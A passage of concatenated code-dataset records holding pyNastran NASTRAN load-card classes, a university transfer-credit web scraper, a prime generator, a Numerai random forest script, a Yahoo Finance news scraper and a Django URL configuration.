exciteID\r\n\r\n def rawFields(self):\r\n list_fields = ['TLOAD2', self.sid, self.exciteID, self.delay, self.Type,\r\n self.T1, self.T2, self.frequency, self.phase, self.c, self.b,\r\n self.us0, self.vs0]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n frequency = set_blank_if_default(self.frequency, 0.0)\r\n phase = set_blank_if_default(self.phase, 0.0)\r\n c = set_blank_if_default(self.c, 0.0)\r\n b = set_blank_if_default(self.b, 0.0)\r\n\r\n us0 = set_blank_if_default(self.us0, 0.0)\r\n vs0 = set_blank_if_default(self.vs0, 0.0)\r\n list_fields = ['TLOAD2', self.sid, self.exciteID, self.delay, self.Type,\r\n self.T1, self.T2, frequency, phase, c, b, us0, vs0]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n\r\n\r\nclass RFORCE(Load):\r\n type = 'RFORCE'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n self.sid = integer(card, 1, 'sid')\r\n self.nid = integer_or_blank(card, 2, 'nid', 0)\r\n self.cid = integer_or_blank(card, 3, 'cid', 0)\r\n self.scale = double_or_blank(card, 4, 'scale', 1.)\r\n self.r1 = double_or_blank(card, 5, 'r1', 0.)\r\n self.r2 = double_or_blank(card, 6, 'r2', 0.)\r\n self.r3 = double_or_blank(card, 7, 'r3', 0.)\r\n self.method = integer_or_blank(card, 8, 'method', 1)\r\n self.racc = double_or_blank(card, 9, 'racc', 0.)\r\n self.mb = integer_or_blank(card, 10, 'mb', 0)\r\n self.idrf = integer_or_blank(card, 11, 'idrf', 0)\r\n assert len(card) <= 12, 'len(RFORCE card) = %i' % len(card)\r\n else:\r\n self.sid = data[0]\r\n print(\"RFORCE = %s\" % data)\r\n raise NotImplementedError(data)\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by RFORCE sid=%s' % self.sid\r\n if self.nid > 0:\r\n 
self.nid = model.Node(self.nid, msg=msg)\r\n self.cid = model.Coord(self.cid, msg=msg)\r\n\r\n def Nid(self):\r\n if isinstance(self.nid, int):\r\n return self.nid\r\n return self.nid.nid\r\n\r\n def Cid(self):\r\n if isinstance(self.cid, int):\r\n return self.cid\r\n return self.cid.cid\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def rawFields(self):\r\n list_fields = ['RFORCE', self.sid, self.Nid(), self.Cid(), self.scale,\r\n self.r1, self.r2, self.r3, self.method, self.racc,\r\n self.mb, self.idrf]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n #method = set_blank_if_default(self.method,1)\r\n racc = set_blank_if_default(self.racc, 0.)\r\n mb = set_blank_if_default(self.mb, 0)\r\n idrf = set_blank_if_default(self.idrf, 0)\r\n list_fields = ['RFORCE', self.sid, self.Nid(), self.Cid(), self.scale,\r\n self.r1, self.r2, self.r3, self.method, racc,\r\n mb, idrf]\r\n return list_fields\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n if size == 8:\r\n return self.comment() + print_card_8(card)\r\n return self.comment() + print_card_16(card)\r\n #return self.comment() + card_writer(card)\r\n\r\n\r\nclass RLOAD1(TabularLoad):\r\n r\"\"\"\r\n Defines a frequency-dependent dynamic load of the form\r\n for use in frequency response problems.\r\n\r\n .. math::\r\n \\left\\{ P(f) \\right\\} = \\left\\{A\\right\\} [ C(f)+iD(f)]\r\n e^{ i \\left\\{\\theta - 2 \\pi f \\tau \\right\\} }\r\n\r\n ::\r\n\r\n RLOAD1 SID EXCITEID DELAY DPHASE TC TD TYPE\r\n RLOAD1 5 3 1\r\n \"\"\"\r\n type = 'RLOAD1'\r\n\r\n def __init__(self, card=None, data=None, comment=''):\r\n TabularLoad.__init__(self, card, data)\r\n if comment:\r\n self._comment = comment\r\n if card:\r\n self.sid = integer(card, 1, 'sid')\r\n self.exciteID = integer(card, 2, 'exciteID')\r\n self.delay = integer_double_or_blank(card, 3, 'delay')\r\n self.dphase = integer_double_or_blank(card, 4, 'dphase')\r\n self.tc = integer_or_blank(card, 5, 'tc', 0)\r\n self.td = integer_or_blank(card, 6, 'td', 0)\r\n self.Type = integer_string_or_blank(card, 7, 'Type', 'LOAD')\r\n\r\n if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n self.Type = 'LOAD'\r\n elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n self.Type = 'DISP'\r\n elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n self.Type = 'VELO'\r\n elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n self.Type = 'ACCE'\r\n else:\r\n msg = 'invalid RLOAD1 type Type=|%s|' % self.Type\r\n raise RuntimeError(msg)\r\n assert len(card) <= 8, 'len(RLOAD1 card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def cross_reference(self, model):\r\n msg = ' which is required by RLOAD1 sid=%s' % (self.sid)\r\n if self.tc:\r\n self.tc = model.Table(self.tc, msg=msg)\r\n if self.td:\r\n self.td = model.Table(self.td, msg=msg)\r\n\r\n #def LoadID(self, lid):\r\n #return self.Lid()\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def Tc(self):\r\n if self.tc == 0:\r\n return None\r\n elif isinstance(self.tc, int):\r\n return self.tc\r\n return self.tc.tid\r\n\r\n def Td(self):\r\n if self.td == 0:\r\n return None\r\n elif isinstance(self.td, int):\r\n return self.td\r\n return self.td.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['RLOAD1', self.sid, self.exciteID, self.delay, self.dphase,\r\n self.Tc(), self.Td(), self.Type]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n Type = set_blank_if_default(self.Type, 'LOAD')\r\n list_fields = ['RLOAD1', self.sid, self.exciteID, self.delay, self.dphase,\r\n self.Tc(), self.Td(), 
Type]\r\n        return list_fields\r\n\r\n    def write_bdf(self, size, card_writer):\r\n        card = self.reprFields()\r\n        return self.comment() + card_writer(card)\r\n\r\n\r\nclass RLOAD2(TabularLoad):\r\n    r\"\"\"\r\n    Defines a frequency-dependent dynamic load of the form\r\n    for use in frequency response problems.\r\n\r\n    .. math:: \\left\\{ P(f) \\right\\} = \\left\\{A\\right\\} * B(f)\r\n        e^{ i \\left\\{ \\phi(f) + \\theta - 2 \\pi f \\tau \\right\\} }\r\n\r\n    ::\r\n\r\n      RLOAD2 SID EXCITEID DELAY DPHASE TB TP TYPE\r\n      RLOAD2 5 3 1\r\n    \"\"\"\r\n    type = 'RLOAD2'\r\n\r\n    def __init__(self, card=None, data=None, comment=''):\r\n        TabularLoad.__init__(self, card, data)\r\n        if comment:\r\n            self._comment = comment\r\n        if card:\r\n            self.sid = integer(card, 1, 'sid')\r\n            self.exciteID = integer(card, 2, 'exciteID')\r\n            self.delay = integer_double_or_blank(card, 3, 'delay')\r\n            self.dphase = integer_double_or_blank(card, 4, 'dphase')\r\n            self.tb = integer_or_blank(card, 5, 'tb', 0)\r\n            self.tp = integer_or_blank(card, 6, 'tp', 0)\r\n            self.Type = string_or_blank(card, 7, 'Type', 'LOAD')\r\n\r\n            if self.Type in [0, 'L', 'LO', 'LOA', 'LOAD']:\r\n                self.Type = 'LOAD'\r\n            elif self.Type in [1, 'D', 'DI', 'DIS', 'DISP']:\r\n                self.Type = 'DISP'\r\n            elif self.Type in [2, 'V', 'VE', 'VEL', 'VELO']:\r\n                self.Type = 'VELO'\r\n            elif self.Type in [3, 'A', 'AC', 'ACC', 'ACCE']:\r\n                self.Type = 'ACCE'\r\n            else:\r\n                msg = 'invalid RLOAD2 type Type=|%s|' % self.Type\r\n                raise RuntimeError(msg)\r\n            assert len(card) <= 8, 'len(RLOAD2 card) = %i' % len(card)\r\n        else:\r\n            raise NotImplementedError(data)\r\n\r\n    def cross_reference(self, model):\r\n        msg = ' which is required by RLOAD2=%s' % (self.sid)\r\n        if self.tb:\r\n            self.tb = model.Table(self.tb, msg=msg)\r\n        if self.tp:\r\n            self.tp = model.Table(self.tp, msg=msg)\r\n\r\n    def getLoads(self):\r\n        return [self]\r\n\r\n    #def Lid(self):\r\n        #return self.lid\r\n\r\n    def LoadID(self):\r\n        return self.sid\r\n\r\n    def Tb(self):\r\n        if self.tb == 0:\r\n            return None\r\n        elif isinstance(self.tb, int):\r\n            return self.tb\r\n        return self.tb.tid\r\n\r\n    def Tp(self):\r\n        if self.tp == 0:\r\n            return None\r\n        elif isinstance(self.tp, int):\r\n            return self.tp\r\n        return self.tp.tid\r\n\r\n    def rawFields(self):\r\n        list_fields = ['RLOAD2', self.sid, self.exciteID, self.delay, self.dphase,\r\n                       self.Tb(), self.Tp(), self.Type]\r\n        return list_fields\r\n\r\n    def reprFields(self):\r\n        Type = set_blank_if_default(self.Type, 'LOAD')\r\n        list_fields = ['RLOAD2', self.sid, self.exciteID, self.delay, self.dphase,\r\n                       self.Tb(), self.Tp(), Type]\r\n        return list_fields\r\n\r\n    def write_bdf(self, size, card_writer):\r\n        card = self.reprFields()\r\n        return self.comment() + card_writer(card)\r\n\r\n\r\nclass RandomLoad(BaseCard):\r\n    def __init__(self, card, data):\r\n        pass\r\n\r\n\r\nclass RANDPS(RandomLoad):\r\n    r\"\"\"\r\n    Power Spectral Density Specification\r\n\r\n    Defines load set power spectral density factors for use in random analysis\r\n    having the frequency dependent form:\r\n\r\n    .. math:: S_{jk}(F) = (X+iY)G(F)\r\n    \"\"\"\r\n    type = 'RANDPS'\r\n\r\n    def __init__(self, card=None, data=None, comment=''):\r\n        if comment:\r\n            self._comment = comment\r\n        if card:\r\n            #: Random analysis set identification number. 
(Integer > 0)\r\n #: Defined by RANDOM in the Case Control Deck.\r\n self.sid = integer(card, 1, 'sid')\r\n\r\n #: Subcase identification number of the excited load set.\r\n #: (Integer > 0)\r\n self.j = integer(card, 2, 'j')\r\n\r\n #: Subcase identification number of the applied load set.\r\n #: (Integer >= 0; K >= J)\r\n self.k = integer(card, 3, 'k')\r\n\r\n #: Components of the complex number. (Real)\r\n self.x = double_or_blank(card, 4, 'x', 0.0)\r\n self.y = double_or_blank(card, 5, 'y', 0.0)\r\n #: Identification number of a TABRNDi entry that defines G(F).\r\n self.tid = integer_or_blank(card, 6, 'tid', 0)\r\n assert len(card) <= 7, 'len(RANDPS card) = %i' % len(card)\r\n else:\r\n raise NotImplementedError(data)\r\n\r\n def cross_reference(self, model):\r\n if self.tid:\r\n msg = ' which is required by RANDPS sid=%s' % (self.sid)\r\n self.tid = model.Table(self.tid, msg=msg)\r\n\r\n def getLoads(self):\r\n return [self]\r\n\r\n def Tid(self):\r\n if self.tid == 0:\r\n return None\r\n elif isinstance(self.tid, int):\r\n return self.tid\r\n return self.tid.tid\r\n\r\n def rawFields(self):\r\n list_fields = ['RANDPS', self.sid, self.j, self.k, self.x, self.y,\r\n self.Tid()]\r\n return list_fields\r\n\r\n def reprFields(self):\r\n return self.rawFields()\r\n\r\n def write_bdf(self, size, card_writer):\r\n card = self.reprFields()\r\n return self.comment() + card_writer(card)\r\n","sub_path":"pyNastran/bdf/cards/loads/loads.py","file_name":"loads.py","file_ext":"py","file_size_in_byte":28847,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"462756268","text":"#!/usr/bin/env python3\n\nfrom bs4 import BeautifulSoup\nimport csv\nimport requests\n\nURL_Base = \"https://www.banweb.mtu.edu/owassb/mtu_transfer_detail.\"\nURL_State = URL_Base + \"P_TRNS_STATE\"\nURL_School = URL_Base + \"P_TRNS_SCHOOL\"\nURL_Transcript = URL_Base + \"P_TRNS_FULL\"\n\n\"\"\"\nCSV Order:\n Header:\n single line at top of csv.\n Data:\n In one line, csv delimited.\n transfering_state_code,transfering_state_name,\n transfering_college_code,transferring_college_name,\n transfering_subject,transfering_number,\n transfering_credits,MTU_class_name,\n MTU_subject,MTU_number,MTU_credits\n\"\"\"\n\n# Fun stats information\ntotal_bytes_transfered = 0\n\n\nclass Class_Object(object):\n\n \"\"\"\n Object containing relational information between transferable classes\n and MTU's counts for them.\n \"\"\"\n\n transfering_state_code = \"\"\n transfering_state_name = \"\"\n transfering_college_code = \"\"\n transferring_college_name = \"\"\n transfering_subject = \"\"\n transfering_number = \"\"\n transfering_credits = \"\"\n MTU_class_name = \"\"\n MTU_subject = \"\"\n MTU_number = \"\"\n MTU_credits = \"\"\n\n def __init__(\n self,\n transfering_state_code, transfering_state_name,\n transfering_college_code, transferring_college_name,\n transfering_subject, transfering_number,\n transfering_credits, MTU_class_name, MTU_subject,\n MTU_number, MTU_credits):\n \"\"\"\n Initializer for the Class_Object containing all data\n \"\"\"\n self.transfering_state_code = transfering_state_code\n self.transfering_state_name = transfering_state_name\n self.transfering_college_code = transfering_college_code\n self.transferring_college_name = transferring_college_name\n self.transfering_subject = transfering_subject\n self.transfering_number = transfering_number\n self.transfering_credits = transfering_credits\n self.MTU_class_name = MTU_class_name\n self.MTU_subject = MTU_subject\n 
self.MTU_number = MTU_number\n        self.MTU_credits = MTU_credits\n\n    def __str__(self):\n        \"\"\"\n        Converts Class_Object into a human readable string\n        \"\"\"\n        return (\"Transfering State Code: {}\\nTransfering State Name: {}\\n\"\n                \"Transfering College Code: {}\\nTransfering College Name: {}\\n\"\n                \"Transfering Subject: {}\\nTransfering Course Number: {}\\n\"\n                \"Transfering Credits: {}\\nMTU Class Name: {}\\n\"\n                \"MTU Subject: {}\\nMTU Course Number: {}\\nMTU Credits: {}\"\n                ).format(\n            self.transfering_state_code, self.transfering_state_name,\n            self.transfering_college_code, self.transferring_college_name,\n            self.transfering_subject, self.transfering_number,\n            self.transfering_credits, self.MTU_class_name, self.MTU_subject,\n            self.MTU_number, self.MTU_credits)\n\n    def toCSV(self):\n        \"\"\"\n        Converts Class_Object to a CSV row entry with values quoted\n        \"\"\"\n        return '\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\",\"{}\"\\n'.format(\n            self.transfering_state_code, self.transfering_state_name,\n            self.transfering_college_code, self.transferring_college_name,\n            self.transfering_subject, self.transfering_number,\n            self.transfering_credits, self.MTU_class_name,\n            self.MTU_subject, self.MTU_number, self.MTU_credits\n        )\n\n    def toDict(self):\n        \"\"\"\n        Converts Class_Object to a dictionary\n        \"\"\"\n        return {\n            'Transfering State Code': self.transfering_state_code,\n            'Transfering State Name': self.transfering_state_name,\n            \"Transfering College Code\": self.transfering_college_code,\n            \"Transfering College Name\": self.transferring_college_name,\n            \"Transfering Subject\": self.transfering_subject,\n            \"Transfering Course Number\": self.transfering_number,\n            \"Transfering Credits\": self.transfering_credits,\n            \"MTU Class Name\": self.MTU_class_name,\n            \"MTU Subject\": self.MTU_subject,\n            \"MTU Course Number\": self.MTU_number,\n            \"MTU Credits\": self.MTU_credits\n        }\n\n\nclass College_Object(object):\n\n    \"\"\"\n    Object containing relational information about a college, its state\n    and a list of its classes.\n    \"\"\"\n\n    college_code = \"\"\n    college_name = \"\"\n    college_state_code = \"\"\n    college_state_name = \"\"\n    class_list = None\n\n    def __init__(\n            self, college_code, college_name, college_state_code,\n            college_state_name):\n        \"\"\"\n        Initialization of a college Object\n        \"\"\"\n        self.college_code = college_code\n        self.college_name = college_name\n        self.college_state_code = college_state_code\n        self.college_state_name = college_state_name\n        self.class_list = list()\n\n    def __str__(self):\n        \"\"\"\n        Converts a College_Object into a human readable string\n        \"\"\"\n        return (\n            \"College Code: {}\\nCollege Name: {}\\n\"\n            \"State Code: {}\\nState Name: {}\\nClass List: [{}]\\n\"\n        ).format(\n            self.college_code, self.college_name,\n            self.college_state_code, self.college_state_name,\n            self.class_list\n        )\n\n\nclass File_Utils(object):\n\n    \"\"\"\n    File utilities for writing and reading data from files\n    \"\"\"\n\n    def __init__(self):\n        \"\"\"\n        Blank init\n        \"\"\"\n\n    def write_to_csv(self, class_obj_list, output_file_name):\n        \"\"\"\n        Writes the class_obj_list to a value quoted CSV file\n\n        :class_obj_list: Class Object list to get data from\n        :output_file_name: Name of the file to write to\n\n        :returns: None\n        \"\"\"\n        with open(output_file_name, 'w') as csv_file:\n            field_names = [\n                'Transfering State Code', 'Transfering State Name',\n                \"Transfering College Code\", \"Transfering College Name\",\n                \"Transfering Subject\", \"Transfering Course Number\",\n                \"Transfering Credits\", 
\"MTU Class Name\", \"MTU Subject\",\n \"MTU Course Number\", \"MTU Credits\"]\n writer = csv.DictWriter(csv_file, fieldnames=field_names,\n quoting=csv.QUOTE_ALL)\n\n writer.writeheader()\n for course in class_obj_list:\n writer.writerow(course.toDict())\n\n def read_from_csv(self, input_file_name):\n \"\"\"\n Reads a CSV file and outputs the contents\n\n :input_file_name: File to read from\n\n :returns: None\n \"\"\"\n with open(input_file_name) as csv_file:\n csv_reader = csv.reader(csv_file)\n for row in csv_reader:\n print('\"{}\"'.format('\", \"'.join(row)))\n\n def read_from_csv_to_Class_Obj_List(self, input_file_name):\n \"\"\"\n Reads from a file and returns a list of Class_Object's to rebuild data\n\n :input_file_name: File to read from\n\n :returns: A list of ClassObjects\n \"\"\"\n class_obj_list = list()\n with open(input_file_name) as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n new_class_obj = Class_Object(\n row['Transfering State Code'],\n row['Transfering State Name'],\n row[\"Transfering College Code\"],\n row[\"Transfering College Name\"],\n row[\"Transfering Subject\"],\n row[\"Transfering Course Number\"],\n row[\"Transfering Credits\"],\n row[\"MTU Class Name\"],\n row[\"MTU Subject\"],\n row[\"MTU Course Number\"],\n row[\"MTU Credits\"]\n )\n class_obj_list.append(new_class_obj)\n return class_obj_list\n\n\ndef get_state_mapping():\n \"\"\"\n Get a list of states from MTU's banweb course transfer database\n\n :returns: A Dictioary of State Codes with their State Value\n \"\"\"\n req = requests.get(URL_State)\n global total_bytes_transfered\n total_bytes_transfered += len(req.content)\n soup = BeautifulSoup(req.text, 'html5lib')\n content = soup.find(\"select\", {\"name\": \"state_code\"})\n options = content.select('option[value]')\n state_dict = dict()\n for item in options:\n state_dict.update({\n item.get(\"value\"): item.text.replace(\"\\n\", \"\")\n })\n return state_dict\n\n\ndef get_colleges_from_state(state_code):\n \"\"\"\n Gathers course data from the MTU Banweb database for the specified\n state and generates a dictionary of Colleges associated with a state\n\n :state_code: The code of the state to gather colleges from\n\n :returns: A Dictionary of college IDs with an associated College Name\n \"\"\"\n data = {\"state_code\": state_code}\n req = requests.post(URL_School, data)\n global total_bytes_transfered\n total_bytes_transfered += len(req.content)\n soup = BeautifulSoup(req.text, 'html5lib')\n content = soup.find(\"select\", {\"name\": \"SBGI_CODE\"})\n options = content.select('option[value]')\n college_dict = dict()\n for item in options:\n college_dict.update({\n item.get(\"value\"): item.text.replace(\"\\n\", \"\")\n })\n return college_dict\n\n\ndef get_courses_from_college(college_object_list):\n \"\"\"\n Gathers course data from the MTU Banweb database for the specified\n Colleges and stored it inside the associated College Objct\n\n :college_object_list: A list of College Objects to store data into\n\n :returns: None\n \"\"\"\n for college_obj in college_object_list:\n data = {\n \"SBGI_CODE\": college_obj.college_code,\n \"state\": college_obj.college_state_code\n }\n req = requests.post(URL_Transcript, data)\n global total_bytes_transfered\n total_bytes_transfered += len(req.content)\n soup = BeautifulSoup(req.text, \"html5lib\")\n # There's no IDs or classes for the tables only CSS padding\n # pray they never change the layout\n table = soup.table.table\n # DEBUG: strip out the CSS so I can actually read 
this\n for tag in table.findAll(True):\n for attribute in [\"bgcolor\", \"style\", \"nowrap\"]:\n del tag[attribute]\n table_rows = table.find_all('tr')\n # First two rows are just identifiers we don't care about\n for row in table_rows[2::]:\n table_columns = row.find_all('td')\n if len(table_columns) != 7:\n print(\"Following row was not of length 7 \\\n issues may occur, skipping. [{}]\".format(row))\n continue\n Oth_Subj = table_columns[0].find(text=True)\n Oth_Numb = table_columns[1].find(text=True)\n Oth_Cred = table_columns[2].find(text=True)\n MTU_Name = table_columns[3].find(text=True)\n MTU_Subj = table_columns[4].find(text=True)\n MTU_Numb = table_columns[5].find(text=True)\n MTU_Cred = table_columns[6].find(text=True)\n college_obj.class_list.append(\n Class_Object(\n college_obj.college_state_code,\n college_obj.college_state_name,\n college_obj.college_code,\n college_obj.college_name,\n Oth_Subj, Oth_Numb, Oth_Cred,\n MTU_Name, MTU_Subj, MTU_Numb, MTU_Cred\n )\n )\n return None\n\n\ndef get_college_object_list(state_mapping):\n \"\"\"\n Gathers a list of College Objects from MTU's Banweb database\n\n :state_mapping: A Dictionary of State Codes to State Names\n\n :returns: A list of College Objects\n \"\"\"\n college_obj_list = list()\n for state_code, state_name in state_mapping.items():\n colleges_from_state = get_colleges_from_state(state_code)\n for college_code, college_name in colleges_from_state.items():\n college_obj_list.append(\n College_Object(\n college_code, college_name,\n state_code, state_name\n )\n )\n return college_obj_list\n\n\ndef college_obj_list_to_class_obj_list(college_obj_list):\n \"\"\"\n Converts a compiled College Object list into a more flat and\n usable overall College Course List\n\n :college_obj_list: List of College Objects to parse from\n\n :returns: A List of Course Objects\n \"\"\"\n class_obj_list = list()\n for college_obj in college_obj_list:\n class_obj_list.extend(college_obj.class_list)\n return class_obj_list\n\n\ndef get_course_object_list():\n \"\"\"\n Gathers live data from the MTU Banweb DB for classes\n and stores it into a list of Course Objects\n\n :returns: List of Course Objects\n \"\"\"\n print(\"Acquiring state map\")\n state_mapping = get_state_mapping()\n print(\"Mapping colleges to states\")\n college_obj_list = get_college_object_list(state_mapping)\n print(\"Getting course data from colleges\")\n get_courses_from_college(college_obj_list)\n return college_obj_list_to_class_obj_list(college_obj_list)\n\n\ndef main():\n files = File_Utils()\n files.write_to_csv(get_course_object_list(), \"/tmp/writer.csv\")\n global total_bytes_transfered\n print(\"Bytes wasted: {}\".format(\n total_bytes_transfered))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"banwebScrape.py","file_name":"banwebScrape.py","file_ext":"py","file_size_in_byte":13711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"281963192","text":"import math\r\n\r\ndef is_prime(x):\r\n if x == 1:\r\n return False\r\n for i in range(2, int(math.sqrt(x)) + 1):\r\n if x % i == 0:\r\n return False\r\n return True\r\n\r\nlist1 = list(range(1, 100))\r\n# print(list1)\r\n\r\nit = (x for x in list1 if is_prime(x))\r\n\r\nprint(next(it))","sub_path":"midA/test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"454242902","text":"# In this version of the algorithm we have to test three 
approaches changing the values of\n# n_estimators, and using autoencoders.\n# The first approach using these data gives us n_estimators = [20, 30, 50, 100], a logloss of 0.692662, and a confidence level of 91.67%\n# The second approach using these data gives us n_estimators = [17, 31, 51, 101], a logloss of 0.692666 and a confidence level of 91.7%\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import log_loss\nimport pandas as pd\nimport numpy as np\nimport time\nimport fcntl\n\nseed = 7\nnp.random.seed(seed)\nstart_time = time.time()\nprint('Start running..................')\ndatadir= './data/'\npredictions = \"./predictions/\"\nlogs = './logs/'\n\n\ntrain = pd.read_csv(datadir + \"numerai_training_data.csv\",header=0)\ntour = pd.read_csv(datadir + \"numerai_tournament_data.csv\",header=0)\nvalid = tour.loc[tour.data_type=='validation']\nfeature_cols = [f for f in train.columns if \"feature\" in f]\n# Configuration params for the random forest algorithm; bags is how many times the loop runs over the data.\nbags=10\nseed=11\n# The number of estimators is the number of trees in the random forest\nmodel = RandomForestClassifier(n_jobs=-1,max_depth=4,n_estimators=16)\nbagged_prediction = np.zeros(valid.shape[0])\nbagged_prediction_tour = np.zeros(tour.shape[0])\nn_estimators = [20, 30, 50, 100] # 4 different estimators\n# valid, train, test\nfor n in range(0,bags):\n    print(\"number of bag:\", n)\n    for n_est in n_estimators:\n        # range([start], stop[, step])\n        print(\"number of trees:\", n_est)\n        model.set_params(n_estimators=n_est)\n        model.fit(train[feature_cols].values,train.target.values)\n        preds = model.predict_proba(valid[feature_cols])[:,1]\n        preds_tour = model.predict_proba(tour[feature_cols])[:,1]\n        bagged_prediction += preds\n        bagged_prediction_tour += preds_tour\n\nprint(\"finished loop\")\nbagged_prediction/=bags*len(n_estimators)\nbagged_prediction_tour/=bags*len(n_estimators) # this is to upload it to the competition\nprint(bagged_prediction)\nprint(\"Logloss: {}\".format(log_loss(valid.target,bagged_prediction)))\n\nvalid['pred'] = bagged_prediction\n\neras = valid.era.unique()\ngood_eras = 0\nfor era in eras:\n    tmp = valid[ valid.era == era ]\n    ll = log_loss( tmp.target, tmp.pred)\n    is_good = ll < 0.693\n    if is_good:\n        good_eras += 1\n    print(\"{} {} {:.2%} {}\".format( era, len( tmp ), ll, is_good))\n\nconsistency = good_eras / float( len( eras ))\nprint(\"\\nconsistency: {:.1%} ({}/{})\".format( consistency, good_eras, len( eras )))\n\nif consistency > 0.58:\n    df_pred_tournament = pd.DataFrame({\n        'id': tour['id'],\n        'probability': bagged_prediction_tour\n    })\n    ll=log_loss(valid.target, bagged_prediction)\n    csv_path = predictions + './rf_predictions_{}_{}.csv'.format(int(time.time()), str(ll)[2:])\n    df_pred_tournament.to_csv(csv_path, columns=('id', 'probability'), index=None)\n    print('Saved: {}'.format(csv_path))\n    txt_path = logs + \"stats_rf_v1.txt\"\n    with open(txt_path, \"a\") as g:\n        g.write('\\n' + 'random forest v1')\n        g.write('\\n' + 'logloss:' + str(ll))\n        g.write('\\n' + 'consistency:' + str(consistency))\n    print('Saved stats: {}'.format(txt_path))\n\nprint('Finished: {}s'.format(time.time() - start_time))\n\n","sub_path":"random_forest_v1.py","file_name":"random_forest_v1.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"237751651","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date, datetime\nfrom model.news 
import StockInfo\nimport re\n\n\nclass YahooHelper:\n def __init__(self):\n self.parser = 'html.parser'\n\n def fetch_news(self, stock):\n url = f\"https://finance.yahoo.com/quote/{stock}/news?p={stock}\"\n list_of_stock_info = []\n header = {'Connection': 'keep-alive',\n 'Expires': '-1',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) \\\n AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36'\n }\n try:\n with requests.get(url, stream=True, headers=header) as page:\n\n soup = BeautifulSoup(page.content, self.parser)\n\n # Need to get the latest article\n # Cf\n latest_news_article = soup.find_all(\n \"div\", class_=\"Cf\")[3]\n\n uuid = latest_news_article.h3.next['data-uuid']\n\n # Description latest_news_article.p.text\n list_of_sentences = latest_news_article.p.text.split(\". \")\n description = '. '.join(list_of_sentences[0:2])\n\n # Title latest_news_article.h3.text\n title = latest_news_article.h3.text\n\n # source latest_news_article.h3.previous\n source = latest_news_article.h3.previous\n\n source_url = latest_news_article.h3.next['href']\n news_url = 'https://finance.yahoo.com' + source_url\n\n published_at = self.get_time_of_article(news_url, header)\n\n stock_price = soup.find(\n id=\"quote-header-info\").contents[2].text\n if('+' in stock_price):\n clean_price = stock_price.split('+')[0]\n else:\n clean_price = stock_price.split('-')[0]\n stock_info = StockInfo(uuid, title, source, published_at,\n description, news_url, stock, clean_price)\n\n list_of_stock_info.append(stock_info)\n except Exception as ex:\n print(\"Error: \", ex, \"Occurred with \" + stock)\n\n return list_of_stock_info\n\n def get_time_of_article(self, new_url, header):\n try:\n with requests.get(new_url, stream=True, headers=header) as page:\n soup = BeautifulSoup(page.content, self.parser)\n return soup.time.text\n except Exception as ex:\n print(\"Error: \", ex, \"Could not process request: \" + new_url)\n current_timestamp = datetime.now()\n return datetime.strftime(current_timestamp, '%B %d, %Y, %I:%M %p')\n","sub_path":"yahoo_news.py","file_name":"yahoo_news.py","file_ext":"py","file_size_in_byte":2771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"53"} +{"seq_id":"517652509","text":"from django.urls import path\nfrom . 
import views\nfrom django.contrib.auth.views import LogoutView\n\nurlpatterns = [\n path('login/',views.CustomLogin.as_view(), name='login'),\n path('logout/',LogoutView.as_view(next_page='login'), name='logout'),\n path('',views.index,name='home'),\n path('song-list',views.SongItemBucket.as_view(), name='song-list'),\n path('song-item/<int:pk>/',views.SongItemDetail.as_view(), name='song-item'),\n path('song-item-create/',views.SongItemCreate.as_view(), name='song-item-create'),\n path('song-item-update/<int:pk>/',views.SongItemUpdate.as_view(), name='song-item-update'),\n path('song-item-delete/<int:pk>/',views.SongItemDelete.as_view(), name='song-item-delete'),\n\n #path('create/',views.create_view,name='create'),\n #path('retrieve/',views.list_view,name='retrieve'),\n #path('<id>/delete', views.delete_view,name='delete'),\n\n path('podcast-list',views.PodcastItemBucket.as_view(), name='podcast-list'),\n path('podcast-item/<int:pk>/',views.PodcastItemDetail.as_view(), name='podcast-item'),\n path('podcast-item-create/',views.PodcastItemCreate.as_view(), name='podcast-item-create'),\n path('podcast-item-update/<int:pk>/',views.PodcastItemUpdate.as_view(), name='podcast-item-update'),\n path('podcast-item-delete/<int:pk>/',views.PodcastItemDelete.as_view(), name='podcast-item-delete'),\n path('participant-item-create/',views.ParticipantCreate.as_view(), name='participant-item-create'),\n \n\n path('audiobook-list',views.AudiobookItemBucket.as_view(), name='audiobook-list'),\n path('audiobook-item/<int:pk>/',views.AudiobookItemDetail.as_view(), name='audiobook-item'),\n path('audiobook-item-create/',views.AudiobookItemCreate.as_view(), name='audiobook-item-create'),\n path('audiobook-item-update/<int:pk>/',views.AudiobookItemUpdate.as_view(), name='audiobook-item-update'),\n 